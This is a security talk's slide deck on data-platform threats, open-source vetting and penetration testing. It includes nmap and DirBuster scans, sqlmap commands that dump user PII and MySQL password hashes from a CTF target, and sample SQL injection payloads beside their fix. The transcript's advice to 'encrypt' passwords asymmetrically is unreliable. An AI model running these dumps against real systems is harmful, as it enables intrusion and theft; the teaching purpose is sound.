Demystify Information Security & Threats for Data-Driven Platforms
Chetan Khatri
Solution Architect - Data & ML.
Accionlabs Inc.
18th Oct, 2019
Who Am I?
Professional Career:
● 2016 - Present. - Technical Lead / Solution Architect - Data & ML.
● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice.
● 2014 - 2016 - Developer - Data Platforms.
● 2012 - 2014 - Consultant - Product developments.
University: Master of Computer Science.
Data Warehousing, Data Mining, Information Security / Cryptography, Reverse
Engineering, Information Retrieval.
Agenda
● Motivation
● Information Security - Ethics.
● Encryption
● Authentication
● Information Security & Potential threats with Open Source World.
● Find vulnerabilities.
● Checklist before using any Open Source library.
● Vulnerabilities report.
● Penetration Testing for Data Driven Developments.
Information Security - Motivation
Why is Information Security important?
Information Security - Motivation
Source:
https://www.huffingtonpost.in/2018/07/06/hackers-have-accessed-email-ids-phone-numbers-of-over-5-million-yatra-users_a_23475885/
Information Security - Motivation
Source:
https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
Information Security - Motivation
Source:
https://economictimes.indiatimes.com/small-biz/security-tech/security/zomato-hacked-security-breach-results-in-17-million-user-data-stolen/articleshow/58729251.cms
Information Security - Motivation
Source:
https://www.forbes.com/sites/zakdoffman/2019/07/09/warning-as-millions-of-zoom-users-risk-webcam-hijack-change-your-settings-now/#281cb40642d9
Information Security - Motivation
Source:
https://www.zdnet.com/article/another-data-leak-hits-india-aadhaar-biometric-database/
Information Security - Ethics.
● Information Storage - What, Which form, Access to whom?
● Information Usage - Where, How, Which form?
● Responsibility - Ownership, usage?
● Confidentiality
● Authentication
● Governance - Regulators, Guidelines, Damage?
● Freedom vs Force
● Damage to the Society.
● Impact on humanity.
● Data Breach and Cost.
Freedom vs Force
Source:
https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Freedom vs Force
Source:
https://www.cnbc.com/2018/04/10/facebook-cambridge-analytica-a-timeline-of-the-data-hijacking-scandal.html
Source:
https://www.engadget.com/2019/07/24/facebook-will-pay-5-billion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics
Source:
https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-about-cambridge-analytica-in-september-2015-per-court-filing/
Source:
https://www.theguardian.com/news/2018/mar/17/cambridge-analytica-facebook-influence-us-election
Encryption
How many people have seen Password in Plain Text at Database?
80%??
90%??
Yes, Sad but True.
Source:
https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack-password/
Encryption
Never, ever store application passwords in plain text.
Do not "encrypt" them either: encryption is reversible, so whoever holds the key, or steals it along with the database, gets every password back. Store only a salted hash produced by a slow, purpose-built password hashing function (bcrypt, scrypt, Argon2 or PBKDF2) and compare hashes in constant time at login.
Asymmetric (public-key) encryption has its place: protecting data in transit and secrets that must be recoverable, not password verification. If RSA, generate a 4096-bit key pair: ssh-keygen -t rsa -b 4096
Authentication
Common misconfigurations that make authentication moot:
Services bound to a public IP with no network restriction ("open IP")
Unneeded open ports
Default usernames and passwords for databases, services etc.
chmod 777 on every directory and file! Lol ;p
Information Security & Potential threats with Open Source World.
How many of you use Open Source ?
Security for Open Source world
How well do you know what is inside your project?
Security for Open Source world
Known Good Development practices.
Community Supported Open Source Code.
v/s
Random Code found on the Internet.
Vulnerability in Open Source
Source:
https://synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
First look
Key questions for a first look?
● Read the README.md or any other readily accessible introductory information.
● Does the code appear to follow good software development standards?
● Was the code developed for professional use or as a hobby project?
● Any signs of known issues in the code?
● Does the code solve only one use case, or is it robust enough for others?
● Is the project active, or is it archived / "abandoned"?
Look for warning signs...
Warning Signs
Even the author says to use something else!
Source:
https://code.google.com/archive/p/crypto-js/
Built by an unauthorized person
Source:
https://metacpan.org/release/Tivoli-AccessManager-Admin
I did not write this code, but I like it.
Source:
https://github.com/kbranigan/cJSON
Not maintained anymore … Archived!
Source:
https://code.google.com/archive/p/crypto-js/
"Dumbest library" - the author's own words!
Source:
https://github.com/kbranigan/cJSON/commit/730209a718cc9bada631cea136d13017752720f5
It is slower and more susceptible to side-channel attacks by nature.
Source:
http://www.literatecode.com/aes256
What to watch before using any package/library?
Key Questions for each Open Source Library
Are there only 1-2 collaborators? Then unreviewed, potentially harmful code is more likely.
Is code merged to the master branch reviewed through pull requests?
How many issues are OPEN?
Validate that OPEN issues are actually being addressed.
Is the code maintained or abandoned?
Are issues fixed and released promptly?
Key Questions for each Open Source Library
Check recently active committers and commits to understand how old, and how alive, the project is.
Check how they handle vulnerabilities and security.
How can you report security vulnerabilities?
Check open security bugs/issues.
Good example: Apache Community.
https://www.apache.org/security/
Reporting A Vulnerability
Vulnerability Handling
"No known vulnerabilities" does not mean SECURE!
1101 new vulnerabilities reported in October 2019 alone.
Source:
https://nvd.nist.gov/vuln/full-listing/2019/10
Vulnerabilities report
The trend is getting worse!
Source:
https://www.cvedetails.com/browse-by-date.php
Penetration Testing
{Network, Database}
Check the number of OPEN services and ports (-p- scans all 65535 TCP ports, -sS is a SYN scan and needs root, -A adds OS/version detection and default scripts):
sudo nmap -p- -sS -A <IP-Address>
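The nmap line above does a SYN scan, which needs raw sockets and therefore root. As an added example (not from the talk), the Python below does the unprivileged equivalent, a TCP connect scan: a port is "open" if the kernel completes the full three-way handshake, so the listener it starts on 127.0.0.1 for itself never even has to call accept(). The port window and timeout are this example's own choices; it runs offline.

```python
"""Added example: a minimal TCP connect scan, the unprivileged cousin of nmap -sS.

nmap -sS sends a bare SYN and judges the port by the SYN/ACK or RST that comes
back; a connect scan completes the handshake and then closes, so it is noisier
(the target's service sees a connection) but works from any user account.
"""
import socket
from typing import Dict, Iterable, List


def scan_ports(host: str, ports: Iterable[int], timeout: float = 0.2) -> List[int]:
    """Return the subset of `ports` on `host` that accept a TCP connection."""
    open_ports: List[int] = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success and an errno (e.g. ECONNREFUSED)
            # instead of raising, which keeps the loop simple.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def start_listener(host: str = "127.0.0.1") -> socket.socket:
    """Constructed target: bind an ephemeral port and listen.

    The kernel completes handshakes into the backlog on its own, so a scanner
    sees the port as open even though nothing ever accept()s.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv


def demo(window: int = 2) -> Dict[str, object]:
    """Scan a small window around the listener's port; that port must show up."""
    srv = start_listener()
    host, port = srv.getsockname()
    try:
        found = scan_ports(host, range(port - window, port + window + 1))
    finally:
        srv.close()
    return {"listening": port, "open": found}


if __name__ == "__main__":
    print(demo())
```

Against a real host, replace the constructed listener with the target address and a port range; the loop is sequential, so for a full `-p-` sweep you would parallelise it or just use nmap.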
Scan server files / directories for permissions and access (-H runs DirBuster headless, -u is the target):
java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337
httrack website copier
Subgraph Vega
● Vega is a free and open source web security scanner and testing platform for web applications. It checks for:
● SQL Injection
● XSS
● Inadvertently disclosed sensitive information
● Reflected cross-site scripting
● Stored cross-site scripting
● Blind SQL injection
● Remote file include
● Shell injection
● TLS / SSL security settings
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL injection flaws, and a lot more!
● Database fingerprinting.
● Full support for SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
● Automatic recognition of password hash formats and support for cracking them with a dictionary-based attack.
● Dump database tables entirely.
● Out-of-the-box search for database names, table names, column names and values.
● Support for executing arbitrary commands on the database server's operating system and retrieving their standard output.
● Support for establishing an out-of-band stateful TCP connection between the attacker machine and the database server.
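Before the sqlmap demo, it helps to see the flaw it automates and the one-line fix. The following is an added example, not code from the talk: a constructed user table and flag table in an in-memory SQLite database, a lookup written the vulnerable way (string concatenation) beside the safe way (bound parameter), and three hand-written payloads that do by hand what sqlmap's boolean-based detection, --tables and --dump do automatically. Table and column names are this example's own.

```python
"""Added example: the SQL injection flaw sqlmap exploits, and its fix.

Runs entirely on an in-memory SQLite database; the schema and rows are
constructed for the example and stand in for the CTF target in the demo.
"""
import sqlite3
from typing import Dict, List


def make_db() -> sqlite3.Connection:
    """Constructed sample data: a user table plus a table the app never exposes."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE user_profile (email TEXT, password_hash TEXT, name TEXT);
        INSERT INTO user_profile VALUES ('alice@example.com', 'hash-a', 'Alice');
        INSERT INTO user_profile VALUES ('bob@example.com',   'hash-b', 'Bob');
        CREATE TABLE flag (flag1 TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed-for-example}');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, email: str) -> List[str]:
    """The bug: the request parameter is pasted into the SQL text."""
    sql = "SELECT name FROM user_profile WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn: sqlite3.Connection, email: str) -> List[str]:
    """The fix: a bound parameter is data to the engine, never SQL."""
    sql = "SELECT name FROM user_profile WHERE email = ?"
    return [row[0] for row in conn.execute(sql, (email,))]


# What an attacker (or sqlmap, told with -p email) sends in the "email" field.
PAYLOADS: Dict[str, str] = {
    # boolean-based: the WHERE clause becomes always-true, every row comes back
    "boolean": "x' OR '1'='1",
    # UNION-based enumeration: sqlmap's --tables, by hand (SQLite's catalog;
    # on MySQL it would be information_schema.tables)
    "tables": "x' UNION SELECT name FROM sqlite_master WHERE type='table'--",
    # UNION-based extraction: sqlmap's -T flag -C flag1 --dump, by hand
    "dump": "x' UNION SELECT flag1 FROM flag--",
}


def run_payloads(conn: sqlite3.Connection) -> Dict[str, Dict[str, List[str]]]:
    """Fire every payload at both implementations and collect what leaks."""
    return {
        "vulnerable": {k: sorted(lookup_vulnerable(conn, p)) for k, p in PAYLOADS.items()},
        "safe": {k: lookup_safe(conn, p) for k, p in PAYLOADS.items()},
    }


if __name__ == "__main__":
    results = run_payloads(make_db())
    for impl, leaks in results.items():
        for name, rows in leaks.items():
            print(f"{impl:10} {name:8} -> {rows}")
```

The safe version returns nothing for every payload because the whole string is compared against the email column as a value; no amount of quoting in the input can change the statement the engine compiles. That is the property to look for in any data-platform code that builds queries from request parameters, including ORM escape hatches that accept raw SQL.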
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands
The request captured at the proxy is saved to ctf.log and passed with -r; -p email marks the injectable parameter and --dbms=MYSQL skips fingerprinting of other engines.
# Enumerate databases
python sqlmap.py -r ctf.log -p email --dbms=MYSQL --dbs
# Application database: tables, columns, then dump the PII columns
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D ctf --tables
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D ctf -T user_profile --columns
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D ctf -T user_profile -C Email,Mobile,Name --dump
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D ctf -T flag --columns
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D ctf -T flag -C Flag1 --dump
# MySQL system database: account names and password hashes
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D mysql --tables
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D mysql -T user --columns
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D mysql -T user -C User,Password --dump
# Other databases reachable with the same connection
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D test --tables
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D phpmyadmin --tables
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D phpmyadmin -T pma__users --columns
python sqlmap.py -r ctf.log -p email --dbms=MYSQL -D phpmyadmin -T pma__users --dump
Note: column lists for -C are comma-separated with no spaces; a space splits the list into separate shell arguments and sqlmap only sees the first one.
https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a8709f33ac5
Questions?
Hope you had fun!
Thank you!
Chetan Khatri, chetan.khatri@live.com
@khatri_chetan - https://twitter.com/khatri_chetan
https://github.com/chetkhatri

Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
 

Recently uploaded

Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 

Recently uploaded (20)

Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

  • 1. Demystify Information Security & Threats for Data-Driven Platforms
    Chetan Khatri, Solution Architect - Data & ML, Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I?
    Professional Career:
    ● 2016 - Present - Technical Lead / Solution Architect - Data & ML.
    ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice.
    ● 2014 - 2016 - Developer - Data Platforms.
    ● 2012 - 2014 - Consultant - Product developments.
    University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda
    ● Motivation
    ● Information Security - Ethics
    ● Encryption
    ● Authentication
    ● Information Security & Potential threats with the Open Source World
    ● Find vulnerabilities
    ● Checklist before using any Open Source library
    ● Vulnerabilities report
    ● Penetration Testing for Data-Driven Developments
  • 4. Information Security - Motivation. Why is Information Security important?
  • 5. Information Security - Motivation. Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-accessed-email-ids-phone-numbers-of-over-5-million-yatra-users_a_23475885/
  • 6. Information Security - Motivation. Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
  • 7. Information Security - Motivation. Source: https://techcrunch.com/2019/01/30/state-bank-india-data-leak/
  • 8. Information Security - Motivation. Source: https://economictimes.indiatimes.com/small-biz/security-tech/security/zomato-hacked-security-breach-results-in-17-million-user-data-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation. Source: https://www.forbes.com/sites/zakdoffman/2019/07/09/warning-as-millions-of-zoom-users-risk-webcam-hijack-change-your-settings-now/#281cb40642d9
  • 14. Information Security - Ethics
    ● Information Storage - What, which form, access to whom?
    ● Information Usage - Where, how, which form?
    ● Responsibility - Ownership, usage?
    ● Confidentiality
    ● Authentication
    ● Governance - Regulators, guidelines, damage?
    ● Freedom vs Force
    ● Damage to the society.
    ● Impact on humanity.
    ● Data breach and cost.
  • 18. Data Monetization against ethics. Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analytica-facebook-influence-us-election
  • 19. Encryption. How many people have seen passwords in plain text in a database? 80%?? 90%?? Yes, sad but true. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack-password/
  • 20. Encryption. How many people have seen passwords in plain text in a database? 80%?? 90%?? Yes, sad but true. Never store an application's passwords in plain text. Encrypt it. Use asymmetric key encryption. If RSA, use:
    ssh-keygen -t rsa -b 4096
  • 21. Authentication
    ● Open IP
    ● Open ports
    ● Default username and password for database, services etc.
    ● chmod 777 for all directories and files! Lol ;p
  • 22. Information Security & Potential threats with the Open Source World.
  • 23. Information Security & Potential threats with the Open Source World. How many of you use Open Source?
  • 24. Security for the Open Source world. How well do you know what is inside your project?
  • 25. Security for the Open Source world. Known good development practices. Community-supported open source code vs. random code found on the Internet.
  • 26. Vulnerability in Open Source. Source: https://synopsys.com/content/dam/synopsys/sig-assets/reports/2018-ossra.pdf
  • 27. How do I choose GOOD open source?
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look: the first look.
  • 30. Key questions for a first look?
    ● Read the README.md or any other readily accessible introductory information.
    ● Does the code seem to be held to good software development standards?
    ● Was this code developed for professional purposes or as a hobby project?
    ● Any signs of known issues in the code?
    ● Does this code solve only one use case, or is it robust enough for other use cases?
    ● Is this code actively maintained, or an archive ("abandoned")?
    Look for warning signs...
  • 32. Even the author says to use something else! Source: https://code.google.com/archive/p/crypto-js/
  • 33. Built by an unauthorized person. Source: https://metacpan.org/release/Tivoli-AccessManager-Admin
  • 34. "I did not write this code, but I like it." Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore ... Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. "Dumbest library" - the author! Source: https://github.com/kbranigan/cJSON/commit/730209a718cc9bada631cea136d13017752720f5
  • 37. "It is slower and more subjective to side-channel attacks by nature." Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
  • 39. Key questions for each Open Source library
    ● Are there only 1-2 collaborators? Then unreviewed, harmful code is more likely.
    ● Is code merged to the master branch reviewed through a PR?
    ● How many issues are OPEN? Validate that OPEN issues are being addressed.
    ● Is the code maintained or abandoned?
    ● Are issues getting fixed and released promptly?
  • 40. Key questions for each Open Source library
    ● Check recently active committers and commits to understand how old and how alive the project is.
    ● Check how they handle vulnerabilities and security. How can you report security vulnerabilities?
    ● Check open security bugs/issues.
    Good example: the Apache community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn't mean SECURITY! 1101 new vulnerabilities were reported in October 2019 alone. Source: https://nvd.nist.gov/vuln/full-listing/2019/10
  • 44. Vulnerability reports: it is getting far worse! Source: https://www.cvedetails.com/browse-by-date.php
